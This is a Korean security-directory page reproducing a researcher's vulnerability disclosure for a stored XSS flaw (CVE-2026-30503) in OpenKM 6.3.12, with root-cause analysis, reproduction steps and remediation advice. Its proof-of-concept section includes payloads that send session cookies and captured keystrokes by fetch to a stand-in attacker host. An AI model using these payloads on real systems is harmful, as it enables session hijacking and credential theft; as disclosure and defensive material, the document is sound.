Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-30503-OpenKM-6.3.12-Stored-XSS — CVE-2026-30503의 상세 공개: OpenKM v6.3.12의 저장형 XSS 취약점. 근본 원인 분석, PoC 페이로드, 영향 평가, 그리고 보안 연구원과 침투 테스터를 위한 수정 권장 사항을 포함합니다. | Kitploit
도구/GitHubGitHub/dharmstm/cve-2026-30503-openkm-6.3.12-stored-xss
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPapers & ResearchLearning & Education
GitHubdharmstm/cve-2026-30503-openkm-6.3.12-stored-xss

CVE-2026-30503-OpenKM-6.3.12-Stored-XSS

CVE-2026-30503의 상세 공개: OpenKM v6.3.12의 저장형 XSS 취약점. 근본 원인 분석, PoC 페이로드, 영향 평가, 그리고 보안 연구원과 침투 테스터를 위한 수정 권장 사항을 포함합니다.

저장소 보기
83개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🛡️ CVE-2026-30503 — OpenKM v6.3.12 저장형 XSS 취약점

CVE 배지 OpenKM 유형 공개 상태

발견 및 보고자: Dharmendra Kumar — 보안 연구원

사이버 보안 | 침투 테스트 | 취약점 연구 | 책임 있는 공개


📌 목차

  • 개요
  • CVE 세부 정보
  • 영향받는 제품
  • 취약점 설명
  • 근본 원인 분석
  • 영향 및 위험 평가
  • 개념 증명 (PoC)
  • 조치 및 권장 사항
  • 공개 일정
  • 참고 자료
  • 연구원 소개

🔍 개요

이 저장소는 기업 환경에서 널리 사용되는 오픈소스 문서 관리 시스템인 OpenKM v6.3.12에서 확인된 저장형 크로스 사이트 스크립팅 (XSS) 취약점인 CVE-2026-30503의 책임 있는 공개 과정을 문서화합니다.

이 취약점을 통해 인증된 공격자는 지속적인 악성 JavaScript를 애플리케이션에 주입할 수 있으며, 이후 해당 콘텐츠를 보는 모든 사용자(관리자 포함)의 브라우저 컨텍스트에서 실행됩니다.

⚠️ 심각도: 높음 | 공격 벡터: 네트워크 | 필요 권한: 낮음 | 사용자 상호작용: 필요


📋 CVE 세부 정보

필드세부 정보
CVE IDCVE-2026-30503
제품OpenKM
영향받는 버전v6.3.12
취약점 분류저장형 크로스 사이트 스크립팅 (XSS)
CWECWE-79: 웹 페이지 생성 중 입력값의 부적절한 무효화
CVSS 벡터CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
연구원Dharmendra Kumar
공개 유형책임 있는 / 조정된 공개

📦 영향받는 제품

OpenKM은 무료 오픈소스 문서 관리 시스템(DMS)으로, 비즈니스 문서를 관리, 감사 및 배포하기 위한 웹 인터페이스를 제공합니다. 전 세계 기업, 정부 기관 및 교육 기관에서 사용됩니다.

  • 제품명: OpenKM 문서 관리 시스템
  • 영향받는 버전: v6.3.12
  • 공급업체 웹사이트: https://www.openkm.com
  • 분류: 문서 관리 시스템 (DMS)
  • 언어/스택: Java (JSP/Spring)

🧨 취약점 설명

OpenKM v6.3.12에서 여러 저장형 크로스 사이트 스크립팅 (XSS) 취약점이 발견되었습니다. 낮은 권한의 인증된 공격자는 하나 이상의 입력 필드에 임의의 JavaScript 페이로드를 주입할 수 있습니다. 이러한 페이로드는 애플리케이션 백엔드에 영구적으로 저장되며, 관리자를 포함한 모든 사용자가 해당 페이지나 구성 요소에 접근할 때 자동으로 실행됩니다.

Reflected XSS가 피해자가 조작된 링크를 클릭하도록 요구하는 것과 달리, Stored XSS 페이로드는 애플리케이션 자체에 내장되어 훨씬 더 위험하고 지속적입니다.

취약한 엔드포인트

  • 문서 메타데이터, 메모 또는 이름 지정 필드 내의 사용자 제어 입력 필드
  • 애플리케이션이 브라우저에 다시 렌더링하기 전에 사용자 입력을 삭제하거나 인코딩하지 못함

🔬 근본 원인 분석

이 취약점은 애플리케이션의 입력 처리 파이프라인에서 세 가지 복합적인 약점으로 인해 발생합니다.

사용자 입력 ──► [검증 없음] ──► DB에 저장 ──► [출력 인코딩 없음] ──► 브라우저에 렌더링 ──► XSS 실행
약점설명
❌ 입력 검증 누락애플리케이션이 사용자 제공 필드에서 특수 문자(<, >, ", ', ;)를 제한하거나 삭제하지 않음
❌ 출력 인코딩 누락저장된 값이 HTML 엔티티 인코딩 없이 HTML에 직접 렌더링됨
❌ 안전하지 않은 DOM 렌더링CSP 또는 삭제 제어 없이 사용자 제공 데이터가 DOM 컨텍스트에 포함됨

💥 영향 및 위험 평가

이 취약점을 성공적으로 악용하면 다음과 같은 결과가 발생할 수 있습니다.

위험설명
🍪 세션 하이재킹document.cookie 유출을 통한 인증된 세션 토큰 탈취
👤 계정 탈취피해자 계정(관리자 계정 포함) 손상
🔐 자격 증명 수집로그인 자격 증명을 캡처하는 피싱 양식 주입
📤 데이터 유출DMS에서 중요한 문서나 메타데이터를 조용히 추출
⚙️ 권한 없는 작업피해자를 대신하여 권한 있는 작업 수행 (문서 삭제/수정)
🎯 관리자 표적관리자가 콘텐츠를 검토할 때 관리자 패널에서 페이로드 실행
🔄 웜 전파자가 복제 XSS 페이로드가 사용자 간 확산 가능

🧪 개념 증명 (PoC)

⚠️ 면책 조항: 이 PoC는 책임 있는 공개 원칙에 따라 교육 및 보안 연구 목적으로만 공유됩니다. 소유하지 않거나 명시적인 서면 허가를 받지 않은 시스템에 대해 이를 사용하지 마십시오.

페이로드 예시 (일반)

// 기본 PoC — 스크립트 실행 증명
<script>alert('CVE-2026-30503 - XSS by Dharmendra Kumar')</script>

// 세션 토큰 유출
<script>fetch('https://attacker.example.com/steal?c='+document.cookie)</script>

// 키로거 주입
<script>document.onkeypress=function(e){fetch('https://attacker.example.com/log?k='+e.key)}</script>

재현 단계

  1. 낮은 권한의 인증된 계정으로 OpenKM v6.3.12에 로그인합니다.
  2. 취약한 입력 필드(예: 문서 메타데이터 / 메모 / 제목 필드)로 이동합니다.
  3. <script>alert(document.cookie)</script>와 같은 XSS 페이로드를 주입합니다.
  4. 항목을 저장/제출합니다.
  5. 다른 사용자(또는 관리자)로 로그인하여 영향을 받는 리소스로 이동합니다.
  6. JavaScript 페이로드가 피해자의 브라우저 컨텍스트에서 실행되는 것을 확인합니다.

🛠️ 조치 및 권장 사항

개발자/공급업체를 위한 권장 사항

권장 사항구현
✅ 입력 검증허용 문자를 화이트리스트로 지정하고, 모든 사용자 입력에서 HTML 특수 문자를 거부하거나 제거
✅ 출력 인코딩데이터를 HTML에 렌더링하기 전에 컨텍스트 인식 HTML 인코딩(예: OWASP Java Encoder) 사용
✅ 콘텐츠 보안 정책 (CSP)엄격한 CSP 헤더 구현: Content-Security-Policy: script-src 'self'
✅ HTTPOnly 및 보안 쿠키모든 세션 쿠키에 HttpOnly 및 Secure 플래그 설정하여 JS 접근 방지
✅ 보안 라이브러리 사용HTML 삭제를 위해 OWASP AntiSamy 또는 DOMPurify 통합
✅ 보안 코드 검토삭제되지 않은 사용자 제어 데이터에 대한 모든 렌더링 경로 감사
✅ 업그레이드최신 공급업체 패치 적용 또는 패치된 버전으로 업그레이드

시스템 관리자를 위한 권장 사항

  • 🔒 신뢰할 수 있는 네트워크로만 OpenKM 인스턴스에 대한 액세스 제한
  • 📊 입력 필드에서 비정상적인 활동이나 예상치 못한 스크립트 태그가 있는지 애플리케이션 로그 모니터링
  • 🔄 애플리케이션을 최신 패치 릴리스로 업데이트 유지
  • 🧩 보상 제어로 XSS 탐지 규칙이 있는 웹 애플리케이션 방화벽(WAF) 배포

📅 공개 일정

날짜이벤트
🔍 발견OpenKM v6.3.12 보안 평가 중 취약점 확인
📧 공급업체 통지초기 공개 보고서를 OpenKM 보안 팀에 제출
🤝 공급업체 확인OpenKM 팀이 보고서를 확인
📝 CVE 할당CVE 프로그램에서 CVE-2026-30503 할당
🌐 공개 공개수정 기간 이후 조정된 공개

이 취약점은 책임 있는 공개 모범 사례에 따라 공개되었으며, 공개 전에 공급업체 및 CVE 프로그램과 조정되었습니다.


📚 참고 자료

  • 🔗 Github.
  • 🔗 MITRE CVE 항목 — CVE-2026-30503
  • 🔗 NVD — 국가 취약점 데이터베이스
  • 🔗 OpenKM 공식 웹사이트
  • 🔗 OWASP XSS 방지 치트 시트
  • 🔗 CWE-79: 크로스 사이트 스크립팅
  • 🔗 OWASP Top 10 — A03:2021 주입

👨‍💻 연구원 소개

Dharmendra Kumar

보안 연구원 | 침투 테스터 | 버그 헌터

Dharmendra Kumar는 웹 애플리케이션 보안, 침투 테스트 및 책임 있는 취약점 공개를 전문으로 하는 독립적인 사이버 보안 연구원입니다. 널리 사용되는 소프트웨어의 실제 보안 결함을 식별하는 데 중점을 두고 있으며, 그의 작업은 전 세계적으로 사용되는 애플리케이션의 보안 태세를 개선하는 데 기여합니다.

전문 분야:

  • 🌐 웹 애플리케이션 침투 테스트
  • 🐛 버그 바운티 헌팅
  • 🔍 취약점 연구 및 CVE 보고
  • 📋 책임 있는 공개 및 보안 권고
  • 🛡️ OWASP Top 10 취약점

연결:

LinkedIn GitHub Twitter


⚖️ 법적 면책 조항

이 저장소는 교육 및 정보 제공 목적으로만 사용됩니다. 여기에 공유된 취약점 세부 정보 및 개념 증명 페이로드는 책임 있는 공개 원칙에 따라 게시됩니다. 저자는 이 정보의 무단 사용을 묵인, 장려하거나 책임을 지지 않습니다. 모든 시스템에서 보안 테스트를 수행하기 전에 항상 명시적인 서면 허가를 받으십시오.


🙏 감사의 말

다음 분들께 특별히 감사드립니다:

  • 책임 있는 공개 과정에서 협조해 주신 OpenKM 개발 팀
  • CVE 식별자를 할당하고 조정해 주신 CVE 프로그램 / MITRE Corporation
  • 모든 사람을 위한 더 안전한 소프트웨어를 만들기 위한 지속적인 노력을 기울이는 광범위한 보안 연구 커뮤니티

⭐ 이 연구가 도움이 되셨다면, 이 저장소에 별표를 눌러 주시기 바랍니다.

© 2026 Dharmendra Kumar — All Rights Reserved

방문자

도구 다운로드